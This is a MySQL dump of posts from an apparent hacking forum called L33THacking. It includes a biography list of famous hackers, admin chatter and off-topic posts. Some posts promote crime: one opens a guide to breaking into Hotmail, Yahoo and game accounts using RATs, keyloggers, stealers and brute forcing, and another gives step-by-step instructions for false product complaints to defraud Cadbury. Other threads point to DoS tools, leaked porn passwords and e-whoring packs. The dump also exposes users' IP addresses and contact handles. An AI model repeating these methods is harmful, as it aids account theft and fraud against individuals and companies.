content on an encrypted DVD. His court case stands as the first to test the Digital Millennium Copyright Act. Corley was told to remove the program from his website. Though the main link was removed, almost 500 other websites had provided their own links to access and download the program. To continue this motion, Corley posted a banner stating that he encouraged mirroring of the link. And even today, you can still easily find the program. Now Corley lives in N.Y.C. and hosts a radio show called Off the Hook on WBAI as well as Brain Damage on Stony Brook University’s WUSB. He also runs a magazine named 2600: The Hacker Quarterly that provides information about phreaking and basic hacking. In 2001, he took part in a demonstration against the jailing of Kevin Mitnick (see #1) and in 2004 was arrested for videotaping the demonstration and was charged with disorderly conduct. [size=large][b]9. Robert T. Morris, Jr[/b][/size] [img]http://www.toptenz.net/wp-content/uploads/2010/05/robert-morris-jr.jpg[/img] Best known for a worm named after himself, the Morris worm, Robert T. Morris, Jr. is accredited with creating the first computer worm, not to be confused with the first computer virus. While a computer virus uses other files to replicate itself, a computer worm will utilize other networks in order to spread and infect others. In 1988, the Morris worm was created. To hide his tracks, Morris first set off the virus from MIT, even though he built and released it while a student at Cornell. According to Morris, the main purpose of his worm was to see how many computers were connected to the Internet. However, due to a configuration in the worm, it did a lot more damage than expected. Some of the totals ranged from $20,000 to $530,000. Despite this damage, Morris only had to do community service and was spared jail time. Today, Morris is a professor at Massachusetts Institute of Technology teaching in the computer science and electrical engineering field. In the past, despite his record with computer hacking and other illegal activity, he was able to become the chief scientist at the National Computer Security Center. The NCSC is a branch of the National Security Agency. [size=large][b]8. Nahshon Even-Chaim[/b][/size] Nahshon Even-Chaim stands as the first person in Australia to be arrested and convicted of computer hacking. Even-Chaim, better known as Phoenix online, was part of a very popular hacking group based out of Australia known as The Realm. Though the internet wasn’t as widely known during the beginning of his hacking reign, Even-Chaim was able to utilize X.25 networks as well as “dialing-in” methods to hack and focused on penetrating networks of defense and nuclear agencies. Eventually the Australian Federal Police caught on and were able to get a warrant to wire-tap his phone and watch all signals coming in and out of his modem. In April 1990, Even-Chaim’s home, along with two others, was raided. He was arrested and charged with 48 crimes. However, once his time in court came, he was able to strike a bargain and only had to do a 12 month jail term and 500 hours of community service, opposed to 10 years in jail. Today, Even-Chaim works in the IT field and has delved into music. [size=large][b]7. Mark Abene[/b][/size] [img]http://www.toptenz.net/wp-content/uploads/2010/05/Mark-Abene.jpg[/img] Online, you’d have known Mark Abene as “Phiber Optik.” Born in New York City, Abene was a well-known member of groups such as Masters of Deception and Legion of Doom. Both of these groups were known for their hacking skills and often times those who took part in the groups would be able to share hacking knowledge with others. Most of the members were eventually caught and investigated by the F.B.I. Abene was no exception. At the young age of 9, Abene was able to access dial-up computers and from there his curiosity grew and he learned numerous computer languages of the time. He was soon introduced to the Legion of Doom as well as the Masters of Deception and during this time he became interested in operating systems as well as telecommunications which enabled him to learn about the hacking technique of phreaking. However, soon after joining the group, on January 24, 1990, those who took part in these groups had their homes searched. In 1991, he was formally arrested with computer trespassing and tampering. He took a plea bargain and only had to serve 35 months of community service. In 1997, Abene and other ex-members of the Legion of Doom created Crossbar Security, but the company soon went out of business in 2001. Today Abene works as an independent consultant. [size=large][b]6. Fred Cohen[/b][/size] [img]http://www.toptenz.net/wp-content/uploads/2010/05/fred-cohen.jpg[/img] Though not as malicious as most on this list, Fred Cohen is definitely well known in the computer world. Studying to be a computer scientist at University of Southern California’s School of Engineering in 1983, Cohen was able to create the first computer virus. The virus he created was able to completely overtake a computer and control each one of its functions. His virus allowed other computer scientists to see that not all viruses can be solved by just one commonly used algorithm. However, Cohen was also able to create good viruses. As silly as it sounds, he was able to create a virus that did nothing malicious to a computer. After putting the virus on a computer, it went into each executable file (.exe) and made them smaller. He named it the compression virus. Cohen was never jailed because his efforts were done for educational purposes. Today he runs a company that provides information security. [size=large][b]5. Vladimir Levin[/b][/size] Levin was well known in the 1990s for his hacking efforts which exposed the vulnerability of popular company websites, one of the most notable in this case being Citibank. Levin, in 1994, was able to access Citibank accounts belonging to various corporate customers. He used the dial-up wire transfer service and was able to successfully transfer the money out of these accounts into accounts located in Israel, Germany, the U.S., Finland, and the Netherlands. Levin had an accomplice at each of these locations. However, 3 of his accomplices were watched as they attempted to withdraw money. They were arrested and all of them gave signs pointing to Levin. In 1995, Levin was arrested. By the end of it all, Levin was able to successfully, but fraudulently transfer about $10.7 dollars from Citibank accounts into ones he had set up. In 1997 he was brought to the U.S. and pleaded guilty to conspiracy to defraud as well as stealing $3.7 million. He was put in jail for 3 years and ordered to pay $240,015. Out of all the money that Levin was able to transfers out of Citibank into other banking facilities, only $400,000 was located and recovered. Since the incident Citibank has upped its security, as have many other banking companies that utilize online actions. Today he owns and runs a business in Lithuania. [size=large][b]4. John Schiefer[/b][/size] Schiefer is well known for defrauding companies, as well as installing malware to intercept vital information. The malware that Schiefer used was known as “spybots.” These pieces of malware acted as wiretaps and were able to access communications between the infected computer and bank accounts. He then was able to find out usernames, passwords, and other information. From there Schiefer would use the bank accounts to make fraudulent purchases, and would share the information with others. He utilized the same method to infected and gain information from computers with Microsoft operating systems. Once arrested, Schiefer was charged with wire and bank fraud, intercepting private information to commit identity theft, and installing malware on dozens of computers in order to retrieve the private information that he needed. He stands as the first person to be charged with using botnets for hacking purposes. In 2009 he was charged and sentenced to four years in prison. [size=large][b]3. Adrian Lamo[/b][/size] [img]http://www.toptenz.net/wp-content/uploads/2010/05/adrian-lamo-arrest-warrant-266x400.jpg[/img] Known as a grey hat hacker, meaning one who hacks sometimes for good reasons, Adrian Lamo is another hacker that found himself in trouble after the F.B.I was able to probe his illegal actions. Lamo is unique as he never stayed at one location to perform his hacking. He usually lived house to house, couch to couch, and often did a lot of his exploiting and investigating from internet cafes and university libraries. He is well known for exploiting companies such as Microsoft, the New York Times, Lexis-Nexis, and Yahoo!. Because of his actions, many companies, namely, the New York Times, filed complaints and for 15 months Lamo was investigated by the F.B.I. He eventually realized he was being tracked and went into hiding, but surrendered to the U.S. Marshals on September 9, 2003. He plead guilty in court and was ordered to pay $65,000 and was sentenced to home detention and probation afterward. However, Lamo, as a grey hat hacker, did have a good side. He took it upon himself to hack into several different Fortune 500 companies’ websites in order to find security flaws. After finding what he could, he then reported back to the company of what security issues needed to be fixed. While many would get paid for this type of work Lamo never accepted any type of monetary award. Today Lamo is in college working his way towards becoming a top-rated journalist. A documentary, Hackers Wanted, was made depicting Lamo’s life and hacking skills. [size=large][b]2. Kevin Poulsen[/b][/size] [video=youtube]https://www.youtube.com/watch?v=0NxJrCXG6gc[/video] Poulsen, a black hat hacker, meaning one who hacks for a malicious purpose, is well known for his skills. Also known as Dark Dante, Poulsen is probably best known for his takeover of the KIIS-FM phone lines, a Los Angeles based radio station. At the time, the radio was running a contest. The 102nd caller would possibly win a Porsche 944 S2. With this in mind, Poulsen was able to clog all of the lines, which inevitably would make him the 102nd caller. Once the F.B.I realized Poulsen’s actions, they began to investigate him, but during this time he found ways to keep himself hidden. However, one day on Unsolved Mysteries, Poulsen was one of the many fugitives aired on the show, and during that time, the phone lines crashed. Of course this was Poulsen’s doing. In June 1994 he was finally caught and arrested and charged with wire, mail, and computer fraud, as well as money laundering. He spent about 4 months in jail and had to pay $56,000. Today he works as a senior editor for Wired News. [size=large][b]1. Kevin Mitnick[/b][/size] [video=youtube]https://www.youtube.com/watch?v=8_VYWefmy34[/video] At the age of 12, Mitnick learned the high importance of social engineering. Though this type of hacking doesn’t involve computers, it helps you to gain access to things such as emails, social networking sites, and others, by simply asking the right questions. He used this method to bypass the card system used in the L.A. transit system. In 1979, at the age of 16, Mitnick was able to get access to his first computer network. After years of accessing numbers of networks and private emails, as well as cloning cell phones and using false I.D., Mitnick was arrested in 1995. After being arrested, he was charged with evading the F.B.I., wiretapping, computer fraud, hacking into Digital Equipment Corporation systems, taking over a computer at the Computer Learning Center in Los Angeles, and hacking many other systems including Nokia, Motorola, Fujitsu Siemens, and many others. When he was arrested, Mitnick was the most wanted computer hacker in the U.S. His activities cost companies a lot of money. Digital Equipment Corporation alone had to pay $160,000 to clean up the damage Mitnick had done. In 2002 he published a book entitled The Art of Deception: Controlling the Human Element of Security in which he talks all about his experiences and how he did it. Today he owns a company that offers security consulting. [color=transparent]Hacking top 10 l33thacking [/color]', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '4cb0f4a816af974feb8a8dec1bb79594', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1706', '363', '0', '8', 'Top 10 songs of September 2012', '0', '1', 't3h jok3r', '1347133364', '1. Whistle by Flo Rida 2. We Are Never Ever Getting Back Together by Taylor Swift 3. One More Night by Maroon 5 4. Lights by Ellie Glouding 5. Some Nights by FUN. 6. Everybody talks by Neon Talks 7. Wide Awake by Katy Perry 8. Good Time by Owl City & Carly Rae Jepsen 9. As long as you love me by Justin Bieber Featuring Big Sean 10. Call me maybe by Carly Rae Jepsen [color=transparent] rap r&b house classic jusin bieber [/color]', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', 'd44454c3c31d0ff88cccde1e7caccc20', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1707', '358', '1677', '3', 'RE: Misconfigure, Unable & Cloudflare downtime', '0', '20', 'JakeUS', '1347137522', 'Thanks for the information. If you see ANY bugs, report them ASAP!', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', '59b3b9476121a07270e9c4afa305e7fc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1708', '364', '0', '12', 'How to hack accounts Hotmail/yahoo/Runescape/Minecraft/Porn [Guide By NXK]', '0', '61', 'NXK', '1347137768', '[color=#FFFFFF][u][b]Introduction[/b][/u][/color] So you\'re probably looking at this thread intrested in hacking some accounts. For what ever your reasons may be. Maybe it\'s an enemy.. Maybe you want to make some money. What ever your reasons are. You\'ve came to the right place. In this Thread we will be covering me most effective ways to get what you want. Methods to do so. [color=#FFFFFF][u][i][b]What will I be covering?[/b][/i][/u][/color] -Rats (Remote Administration Tool) -Keyloggers (A program that records A victims Keystrokes) -Java Drive By (A website way of exploiting java and installing a Virus via website) -Stealers (steals all saved passwords stored on the Vitims PC) -BruteForcing (A program that uses proxys and username/Password lists to attempt mass logins to A target website In hope of finding someones account password/username', '99.253.65.17', '1677541649', '0', '0', '0', '0', '-2', '97e7bcff401372dc77377eb9b819fdba', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1709', '365', '0', '3', 'HAHA SHIT CAN WORK!!!!', '0', '1', 't3h jok3r', '1347170217', 'After 40+ 404 page not found errors I finally got the new shit ass plugin to work :D Thanks to god and my luck Sorry for the inconvenience. Please report any broken urls or pages.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', 'e97f39cf1d28511c516d31eb0b90f0b6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1710', '366', '0', '2', 'Testing SMTP Emailer', '0', '1', 't3h jok3r', '1347172849', 'HAHAHAHAHAHA', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '905baa10b1eda035aaafdd34f4476c19', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1711', '366', '1710', '2', 'RE: Testing SMTP Emailer', '0', '4', 'Triple H', '1347172892', 'Hope it works..... Lalalaa', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '26370fdbe65defe9b2db460a06c28db7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1712', '366', '1710', '2', 'RE: Testing SMTP Emailer', '0', '5', 'Timmy', '1347172953', 'Yippeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeezzzzzzzzzzzzzzzzz', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', 'b675fa7aea658715b0d541176a287bda', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1713', '367', '0', '3', 'Please Read!', '0', '1', 't3h jok3r', '1347173438', 'Today the site had a lot of 404 page errors, I finally solved the problem after working on it for 5+ hours. Also I finally got our emailer working. From now on all email activations & email notifications will be sent to whoever has subscribed or joined. Almost forgot, I have now customized our 404 error page. Feel free to check it out by entering a invalid LH url. Hope you guys like my updates and dedication to LH.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', 'e46be1c1aabbd0112c922b27291476e2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1714', '368', '0', '47', '5 free @l33thacking.net forwarders', '0', '1', 't3h jok3r', '1347174018', 'I will be creating and giving out 5 @l33thacking.net forwarders to the first 5 people to create 3 HQ threads anywhere on LH. First check in below then post 3 HQ threads and PM me saying you are done or with the links. [b]What is a forwarder?[/b] For example: john@l33thacking.net is the forwarder, when someone sends an email to john@l33thacking.net then john@hotmail.com will receive it. You don\'t have to be using hotmail. John@hotmail was an example. We are not responsible for how you may use this. Any illegal activities on this forwarder, we will deactivate/remove your forwarder.', '72.229.164.105', '1223009385', '1', '0', '1', '1347326947', '1', 'bf1948b47bee85e214025307211fd408', '0', '1347326947'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1715', '331', '1545', '5', 'RE: New Rules and Instructions v.3', '0', '1', 't3h jok3r', '1347176423', 'Added under age rule.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '73b46e24a6554b1210c7be894ae448e5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1716', '249', '1630', '56', 'RE: Last person to reply, wins!', '0', '55', 'Baws', '1347177411', '[quote=\'iTzIpod\' pid=\'1630\' dateline=\'1346961786\'] Lol @Reloadzor but still, I won. [/quote] Not really, by the way, this thread is really LQ.', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', '0c3d3e4a5a4ab0ff863f04986a57c672', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1717', '234', '977', '17', 'RE: Free E-Whoring packs website plus free PORN', '0', '1', 't3h jok3r', '1347178001', 'Sent to fap long time ago ;)', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', 'a6dba44655965091f83065f1e5629f49', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1718', '341', '1614', '54', 'RE: Porn passes (big list)', '0', '1', 't3h jok3r', '1347178287', 'That\'s some huge mother fucking list.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '8e92a5303366bb6d73d9f59e1e52205f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1719', '332', '1701', '4', 'RE: Hello', '0', '172', 'MistaCode', '1347181707', '[quote=\'iTzIpod\' pid=\'1701\' dateline=\'1347120289\'] [quote=\'MistaCode\' pid=\'1700\' dateline=\'1347119948\'] [quote=\'t3h jok3r\' pid=\'1563\' dateline=\'1346796279\'] Welcome to L33THacking Trojan/Mistacode. Since you have come from nerdchat, I have upgraded your account for free. [/quote] Thanks Dude! I can offer you free graphics if you want? Userbar, Logo ? [/quote] Can you add me on Skype and show me some of your examples? I bet you\'re better than me! :/ [/quote] Yeah sure ;) PM me your skype please, or add me: aleksanteri.korhonen', '88.193.83.195', '1489064899', '0', '0', '0', '0', '1', 'e51327ffc2ca05ba13c10cbc6ab764ce', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1720', '369', '0', '55', 'Paypal 1 dollar 50cents', '0', '53', 'sirchamp', '1347182055', 'Hey guys I need 1.50 on Paypal/LR very urgent. I will pay you back as fast as I can.', '188.155.56.90', '-1130678182', '1', '0', '53', '1347182103', '1', 'ff5e56ccdb8aa122436159fc0c043a9a', '0', '1347182103'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1721', '370', '0', '35', 'Basic L33THACKING logo (just an basic one)', '0', '172', 'MistaCode', '1347182680', 'well this is just an basic one i just made so don\'t dislike :D It didn\'t took much time, I can make an better one but lets now just see with this one ;) [img]http://i1107.photobucket.com/albums/h400/maxhax195/Logo1.png[/img] Background is Transparent, so what do you think?', '88.193.83.195', '1489064899', '0', '0', '0', '0', '1', '46eda5faef092e49d860619739a5ecd7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1722', '367', '1713', '3', 'RE: Please Read!', '0', '20', 'JakeUS', '1347197021', 'Thanks for the updates.', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', '878415ee1a9c518d100bc0ee41473c31', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1723', '371', '0', '7', 'How do I make an ICQ account?', '0', '20', 'JakeUS', '1347197111', 'It says I need the password to be in Latin characters. Can someone help?', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', '797e09428a7225ed67a3a1144c1ecd1c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1724', '370', '1721', '35', 'RE: Basic L33THACKING logo (just an basic one)', '0', '82', 'iTzIpod', '1347205618', 'Love transparent backgrounds! What font is that? I rate it a 7/10. Still looks basic and done in a couple of minutes/seconds.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '8b43ee4c1a4778c3470525c616c4d14f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1725', '369', '1720', '55', 'RE: Paypal 1 dollar 50cents', '0', '82', 'iTzIpod', '1347205690', '[quote=\'sirchamp\' pid=\'1720\' dateline=\'1347182055\'] Hey guys I need 1.50 on Paypal/LR very urgent. I will pay you back as fast as I can. [/quote] PM me your paypal email. Will try to give it to you on Monday or Tuesday? Sorry :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9a255f1393e728ecbf80676d9d177a3f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1726', '367', '1713', '3', 'RE: Please Read!', '0', '82', 'iTzIpod', '1347205769', 'Looking good. Thanks for taking the time to fix the errors. I was going to make a thread last night about the 404 Errors... But then I couldn\'t because of the 404 Errors -___-', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1054affc51a3feda6311070cd5e3c19d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1749', '372', '1728', '3', 'RE: Reputation', '0', '1', 't3h jok3r', '1347234358', 'Should be fixed by now. Thanks for reporting.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '851b2cad2f82990a65ed72e8b742d216', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1728', '372', '0', '3', 'Reputation', '0', '53', 'sirchamp', '1347206027', 'I cant rep. Always when I click rate, only a blank page comes. Wierd.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '00557f229ca856472669d0fdf2dfa2e6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1729', '352', '1692', '12', 'RE: Linear Mode How to Take Down Websites Effectively + Proof', '0', '61', 'NXK', '1347206524', '[quote=\'t3h jok3r\' pid=\'1692\' dateline=\'1347079330\'] [quote=\'NXK\' pid=\'1689\' dateline=\'1347078187\'] [quote=\'p420\' pid=\'1687\' dateline=\'1347076992\'] [quote=\'NXK\' pid=\'1660\' dateline=\'1346972166\'] Seems legit. Please add a virus scan for your DoS tool. [/quote] Dude there\'s no need for a virus scan because the download link is seized by the Feds. [/quote] Than may I ask why there is a download link? [/quote] I should probably pay attention more aha... :roflol: The OP is Spacefish, not P420. [/quote]', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '0e91101873309d68ab9b1e6d7ae6c365', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1730', '368', '1714', '47', 'RE: 5 free @l33thacking.net forwarders', '0', '82', 'iTzIpod', '1347208519', '[quote=\'t3h jok3r\' pid=\'1714\' dateline=\'1347174018\'] I will be creating and giving out 5 @l33thacking.net forwarders to the first 5 people to create 3 HQ threads anywhere on LH. First check in below then post 3 HQ threads and PM me saying you are done or with the links. [b]What is a forwarder?[/b] For example: john@l33thacking.net is the forwarder, when someone sends an email to john@l33thacking.net then john@hotmail.com will receive it. You don\'t have to be using hotmail. John@hotmail was an example. [/quote] Basically it\'s an email? I will try :3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '52b666bf9a494b85729c6e2c06fa1f22', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1731', '362', '1705', '7', 'RE: List of TOP 10 HACKERS', '0', '82', 'iTzIpod', '1347209190', 'That\'s really cool. Didn\'t realize that :p I also thought this thread meant: \"Top 10 Hackers of LH\" :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'daa041fcf3387f11eb784a68452bdd90', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1732', '249', '1716', '56', 'RE: Last person to reply, wins!', '0', '82', 'iTzIpod', '1347209509', '[quote=\'Baws\' pid=\'1716\' dateline=\'1347177411\'] [quote=\'iTzIpod\' pid=\'1630\' dateline=\'1346961786\'] Lol @Reloadzor but still, I won. [/quote] Not really, by the way, this thread is really LQ. [/quote] I know. But it does boost the forum\'s activity.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd18470f99ddb3b630ed940fccc40e605', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1733', '372', '1728', '3', 'RE: Reputation', '0', '82', 'iTzIpod', '1347209570', 'Same. I get a Server Error.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '873aac058a8240cc821d775ba3419f59', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1734', '373', '0', '16', 'Cadburys (SE)', '0', '112', '??????Z', '1347209691', 'This is another SE i had done myself. With this you can get anything that Cadburys make, i personally was sent 24 cadburys creme eggs, the more you say you bought the more you get in return, i only complained about 6 creme eggs and received alot more. Step 1: goto: http://www.cadbury.co.uk/contact.aspx and click email us. Step 2: on the form, for category choose product in the first coice and complaint in the second. then continue to fill out the address and contact details with your correct information. in the message put something like this. Hello, Firstly i would like to say i am a huge fan of cadburys. secondly not so much good news i have a complaint, yesterday i purchased (your choice of candy) from (your choice of store) and the candy didnt taste right and the inside of the candy was hard and chewy. (describe the candy to be different to what it is suppose to be like) so i threw the candy away because i felt i would be sick if i ate any more. i was wondering if there is anything you could do about this, Thanks in product name type what it is that you want, leave best before date and lot code empty. for Product Weight/ Multipack Information, put the number of how much of the candy you said you purchased. for Place of purchase put a well known store, for example i put Morrisons because it is a popular store in england. then send the message. they should get back to you within a day. they emailed me back the next day. and i received my products 5 days later. If i helped you please leave Rep. let me know how you all get on :)', '92.22.248.72', '1545009224', '0', '0', '112', '1347209774', '1', '246561b2b30e1419a4a8136c6627dde3', '0', '1347209774'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1735', '374', '0', '19', '[Junk]PLEASE DELETE', '0', '62', 'R?????zo?', '1347212594', 'PLEASE DELETE PLEASE DELETE PLEASE DELETE PLEASE DELETE PLEASE DELETE DOUBLE THREAD.', '94.132.244.168', '1585771688', '0', '0', '62', '1347212777', '1', 'f02bbd754f67552fa2a511fe314f3c63', '0', '1347212777'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1737', '341', '1718', '54', 'RE: Porn passes (big list)', '0', '62', 'R?????zo?', '1347212812', 